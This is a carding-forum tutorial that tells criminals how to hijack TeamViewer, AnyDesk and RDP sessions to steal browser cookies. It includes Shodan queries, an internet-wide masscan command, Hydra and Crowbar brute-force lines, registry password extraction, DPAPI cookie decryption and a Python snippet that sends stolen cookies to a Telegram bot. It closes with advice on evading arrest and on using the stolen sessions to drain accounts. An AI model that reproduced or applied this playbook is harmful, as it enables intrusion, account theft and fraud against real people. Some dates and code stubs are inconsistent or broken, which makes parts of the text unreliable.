Stealing session cookies through vulnerabilities in screen sharing services (TeamViewer, AnyDesk)

[Good Carder]

From a carder to carders. Do you think TeamViewer and AnyDesk are just remote work tools? For us, they're ready-made backdoors installed on millions of computers worldwide. Are you waiting for the victim to install your RAT? Why bother, when TeamViewer is already installed, and its ID is often publicly available. All you have to do is connect.

In this article, I'll discuss how to find public TeamViewer IDs via Shodan, how to exploit AnyDesk vulnerabilities to bypass authentication, how to hijack RDP sessions using tools like FreeRDP-Necro, and how to automate target hunting using Python. You'll learn how to turn legitimate remote support software into your personal tool for stealing session cookies and accessing other people's accounts.

Part 1. TeamViewer and AnyDesk as targets: why they are still vulnerable​

TeamViewer and AnyDesk are the most popular remote control applications. TeamViewer is installed on millions of computers worldwide, often lurking in the background, waiting for incoming connections. For a hacker, this means there's no need to install malware — it's enough to find existing software and bypass its protection.

Why TeamViewer and AnyDesk are still prime targets in 2026:

1. Massive. TeamViewer claims to have 2.5 billion devices with their software installed. Even if only 1% of them have vulnerable versions or weak passwords, that's 25 million ripe targets.
2. Outdated versions. Many users don't update uninstalled applications for years. Vulnerable versions of TeamViewer with CVE-2024-7479 and CVE-2024-7481 are still actively exploited in 2026.
3. Predictable IDs. TeamViewer IDs are not generated randomly. Knowing one ID allows you to search through adjacent IDs and find active sessions.
4. Weak passwords. According to research, over 30% of users leave their passwords at default or use simple combinations like "1234."
5. Vulnerabilities in the infrastructure itself. Researcher Cornelius Brand discovered that TeamViewer "maintains a static connection ID even after the session ends. If you intercept this ID, you can connect to the victim's PC even without a password."

In 2024, TeamViewer suffered a major breach when an APT group (presumably Cozy Bear) gained access to the corporate infrastructure. While user passwords were not compromised, the breach itself undermines trust. In 2027, TeamViewer patched CVE-2024-7479 and CVE-2024-7481 — vulnerabilities in the Windows desktop application (up to version 15.59.3) that allowed an attacker to escalate privileges to SYSTEM and take full control of the system.

In 2026, AnyDesk also experienced a serious incident: hackers breached the company's servers, gained access to production systems, and compromised the source code. In response, AnyDesk revoked all code certificates and web portal passwords.

For the developer, this is a double benefit: firstly, the apps themselves have vulnerabilities, and secondly, public disclosures undermine trust in the developers, and users are less likely to update.

Part 2. TeamViewer and AnyDesk Vulnerabilities in 2026​

2.1. CVE-2024-7479 and CVE-2024-7481: Privilege escalation via vulnerable session handler​

These vulnerabilities allow a local attacker with user rights to escalate their privileges to SYSTEM, gaining complete control over the infected system. In theory, they require local access. In practice, however:

• You get a RAT on the victim's PC through phishing or exploitation of another vulnerability.
• Using CVE-2024-7479, you escalate privileges to SYSTEM and dump browser cookies.

In any case, the presence of a vulnerability in TeamViewer itself is yet another gap in the layered defense.

2.2. TeamViewer in 2025-2026: Password leak via access to the saved password module​

TeamViewer stores passwords for saved sessions in encrypted form. The open-source TeamViewer-Password-Hacker utility extracts the password hash from the registry and recovers it via brute-force. The algorithm is:

1. Run the script on the victim's PC (via RAT or RDP).
2. The script reads the path HKLM\SOFTWARE\WOW6432Node\TeamViewer\VersionXX\Security\.
3. Extracts the encrypted password.
4. Hacks it via dictionary or brute force (TeamViewer uses weak encryption).

As a result, you receive saved passwords to all computers to which the user has ever connected.

2.3. CVE-2024-36033: Idempotency vulnerability in AnyDesk​

In 2024, CVE-2024-36033 was discovered in AnyDesk — insufficient authentication in the API, allowing an attacker to spoof a client ID and bypass license checks. The vulnerability was exploited using a custom payload that intercepted the authentication process and sent fake data to the server. As of 2026, the old version of AnyDesk is still encountered.

2.4. Attack on old TeamViewer protocols 12, 13, 14​

Older versions of TeamViewer (12, 13, 14), which are still actively used, have known vulnerabilities in the key exchange protocol. In 2025, researchers discovered a way to intercept the connection between the TeamViewer client and server, decrypt the traffic, and extract the session token. After this, connecting to the victim's PC becomes possible without a password. Given that many companies block automatic TeamViewer updates due to compatibility with legacy software, these protocols are an open door.

2.5. Social engineering through fake sessions​

The simplest method is to trick the victim into granting you access. You call the "user" posing as support and ask for their TeamViewer ID and password for "system diagnostics." The victim, accustomed to this scenario in legitimate companies, is highly likely to agree.

Important note: recent statistics show a steady increase in attacks using remote access and session hijacking tools. RDP attacks are becoming increasingly sophisticated: attackers use brute force to find administrator accounts and then harvest credentials for further attacks on network resources and hijack RDP sessions. According to reports, the number of devices with open port 3389 (RDP) on the internet reaches tens of millions, and many of them have weak passwords.

Part 3. RDP: Not Just TeamViewer​

TeamViewer and AnyDesk are add-ons. But the most reliable way to hijack a session is to connect to Windows via RDP. By 2026, the number of open RDP servers on the internet is estimated to be in the tens of millions, and many of them are still protected by weak passwords or not protected at all.

3.1 Shodan searches for open RDP ports (port 3389)​

Shodan is your best friend for finding RDP servers.

Shodan's main filters for searching RDP servers:

port:3389 port:3389 country:US os:"Windows 10" — Windows 10 servers with open port 3389 in the US.
port:3389 title:"Windows" authentication:disabled — RDP servers with disabled authentication (red flag).
port:3389 "Authentication: enabled" http.title:"Logon" — RDP login pages via the web client.
port:3389 "Connection" country:US — Open RDP servers in the US.

Shodan also allows you to search for vulnerable RDP servers by banners:

port:3389 "Windows" "Terminal Services" "SSL" "RDP" port:3389 "Microsoft Terminal Services" "RDP 8.1"

3.2 Using RDP to Capture Sessions​

By connecting to an RDP server with user privileges, you see everything the user sees: the desktop, open applications, and active sessions. If the user is logged in and active, you can intercept their browser cookies in real time.

Step-by-step instructions for session hijacking: Find a server with an open port 3389, crack the password (using brute force or dictionary attack), connect using the standard mstsc client (or FreeRDP), and view active processes. If the user is logged in to Chrome, copy their session cookies from C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies and import them into your browser.

Tool: FreeRDP-Necro. This is a fork of FreeRDP with additional scripts for authentication bypass, brute force attacks, and session hijacking. It automates the process: scanning Shodan, brute-force attacks, connecting, and extracting cookies. Since FreeRDP-Necro uses the standard RDP protocol, it behaves like a legitimate client, making it difficult to detect.

3.3 Automatically searching for open RDPs via Python and Shodan​

import shodan

SHODAN_API_KEY = "YOUR_API_KEY"
api = shodan.Shodan(SHODAN_API_KEY)

# Search for open RDPs
query = "port:3389 country:US os:'Windows 10'"

# Save results
results = api.search(query, limit=100)
for result in results['matches']:
ip = result['ip_str']
port = result['port']
org = result.get('org', 'Unknown')
print(f"{ip}:{port} - {org}")
# Save ip,port to file for further brute-force attacks

3.4. RDP Brute Force Tools​

• Hydra (built-in rdp module) allows you to brute-force passwords.

Bash:
hydra -l Administrator -P passwords.txt rdp://192.168.1.1

• Crowbar is a RDP brute-force attack utility with multithreading support.

crowbar -b rdp -s 192.168.1.1/32 -u administrator -C pass.txt -t 10

• NLBrute is a Windows utility with a graphical interface that supports login and password lists, multithreading, SOCKS5, and HTTP proxies. The results are saved to the Good.txt file. It is the most popular utility for carders.

3.5. Bypassing NLA (Network Level Authentication)​

NLA requires authentication before establishing an RDP session. If NLA is disabled, you can connect to a session without a password by simply intercepting the token.

Configuration with NLA disabled: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication = 0. Some Windows servers have this setting by default.

Part 4. Automating Target Search​

We're not looking for one goal. We're looking for thousands.

4.1. RDP and TeamViewer Mass Search Tools​

• Shodan CLI. Automatically downloads results to port 3389 and saves IP addresses to a file.
• Masscan. Scans the entire internet for open ports. Processes a million IP addresses in 3 minutes:

masscan 0.0.0.0/0 -p3389 --rate=10000 -oL rdp_scan.txt

• Nmap with NSE scripts. nmap -p 3389 --script rdp-vuln-ms12-020 <target> checks for the BlueKeep vulnerability (CVE-2019-0708). It's old, but still encountered.
  nmap -p 3389 --script rdp-ntlm-info <target> extracts domain information.
• TeamViewer ID scanners. There are scripts that scan TeamViewer IDs, connect to random IP addresses, and check if the session is active. Once an active ID is found, it is written to the database.

4.2. Automatic RDP brute-force (after scanning)​

import socket
import paramiko # example for SSH, freerdp is required for RDP

def check_rdp(ip, username, password):
# Use subprocess to call crowbar or hydra
# If the connection is successful, return True
return True

4.3. Creating a Live ID Database​

You can write a bot for TeamViewer that contacts router1.teamviewer.com with different IDs and analyzes the response code. If the server responds with 200 OK, the ID is active. The script saves the ID and IP in the database.

Part 5: Stealing Session Cookies via a Hijacked Session​

So, you have RDP access to the victim's PC or a TeamViewer session. What's next?

5.1 Reading Chrome/Edge cookies​

All cookies in modern browsers are stored in encrypted SQLite files. The encryption key is stored in Windows Protected Storage (DPAPI). You can decrypt them while logged in.

The algorithm is:

1. Connect to a remote PC.
2. Run a script that uses SharpWeb to extract all cookies from Chrome, Edge, and Firefox.
3. Decrypt cookies using DPAPI.
4. Save in a format compatible with the EditThisCookie extension.

SharpWeb collects cookies, logins, passwords, and history from all popular browsers. It works via System.Data.SQLite.

Chrome (Edge) cookies are stored in: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies. They are encrypted with a key from Local State. The key must be extracted and decrypted via System.Security.Cryptography.ProtectedData.

Example decryption code (greatly simplified):
csharp:

byte[] encryptedCookies = File.ReadAllBytes("Cookies");
byte[] decryptedCookies = ProtectedData.Unprotect(encryptedCookies, null, DataProtectionScope.CurrentUser);

5.2. Intercepting cookies in real time via traffic sniffing​

If you're connected to the system, you can intercept browser traffic in real time using proxy sniffers, such as mitmproxy. Install mitmproxy on the victim's computer, configure the browser to use the proxy (via system settings or script injection), and intercept all cookies the browser sends when requesting the target website.

This method allows you to steal session cookies in real time, even if they've already been deleted from local storage.

5.3. Automatic exfiltration via Telegram bot​

Collected cookies and passwords can be sent to your server or a Telegram bot using a Python script that runs on the victim's PC (by running an .exe file or PowerShell). Example:

import requests
import json

def send_to_telegram(cookies, chat_id):
TELEGRAM_TOKEN = "YOUR_TOKEN"
url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendMessage"
response = requests.post(url, data={'chat_id': chat_id, 'text': json.dumps(cookies)})

5.4. Using stolen cookies to log into victim accounts (session hijacking)​

Once the cookies are imported (via the EditThisCookie extension), you open the target page in your browser and are automatically logged into the victim's account. You don't need a username or password, and you don't need to complete 2FA. The rest is standard: withdraw funds, change your password, place orders to your addresses, etc.

Part 6. OPSEC and the Carder's Checklist​

For TeamViewer/AnyDesk attacks:

• Scan Shodan for public TeamViewer IDs (although this is difficult) or use ID databases from forums.
• For TeamViewer, use publicly available IDs from leaks or generate them by brute-force.
• Connect to target PCs using vulnerabilities in older versions, weak passwords, or social engineering.
• Retrieve saved passwords with TeamViewer-Password-Hacker.
• To hijack RDP, search for open ports 3389 in Shodan, brute-force administrator passwords, and connect via FreeRDP-Necro.
• Once the session has been hijacked, use SharpWeb to retrieve the cookie.
• Send cookies to your server (VPS for crypto) or via a Telegram bot.
• Import cookies into your browser and log into the victim's account.
• Covering your tracks: Don't store IP addresses, delete logs, and use disposable proxies. For RDP attacks, use a VPS in a country that doesn't have an extradition treaty with yours. A chain of two VPNs, followed by an RDP client, is ideal.

For automation:

• Write a Python script that uses the Shodan API to search for open ports 3389.
• Add a module to check for the BlueKeep vulnerability (CVE-2019-0708) using Nmap.
• Implement RDP password brute-force attack with Hydra.
• Once successfully connected, run the script to retrieve the cookie (SharpWeb) and send the results.

Summary​

TeamViewer, AnyDesk, and RDP are the three pillars of remote access that underpin modern corporate support. They can also be used to steal session cookies and hijack accounts. TeamViewer IDs and RDP ports are discovered using Shadon, passwords are brute-forced, and cookies are decrypted using DPAPI vulnerabilities. These techniques work well individually, but when combined, they offer nearly limitless opportunities for accessing sensitive data, including session cookies.

The primary attack vector is mass scanning of open RDP ports (3389) using Shodan and Masscan. After finding the target and brute-forcing the password (if weak), the attackers hijack the session. Next comes cookie extraction and session hijacking. In 2026, despite all the warnings, there are still a huge number of unprotected devices with remote access on the internet. Your goal is to avoid getting caught. Use proxies, don't keep logs, and destroy all traces after the attack. Remote access doesn't just give you a cookie — it gives you access to the victim's entire digital life.

A quick one-line reminder:
"Shodan finds RDP, Masscan scans 3389, Crowbar cracks passwords, FreeRDP connects. SharpWeb downloads cookies, EditThisCookie imports them. Session stolen — you're logged in, and 2FA is bypassed. Remote access is your gateway to someone else's digital life. RDP + TeamViewer + AnyDesk = your trinity of success in 2026."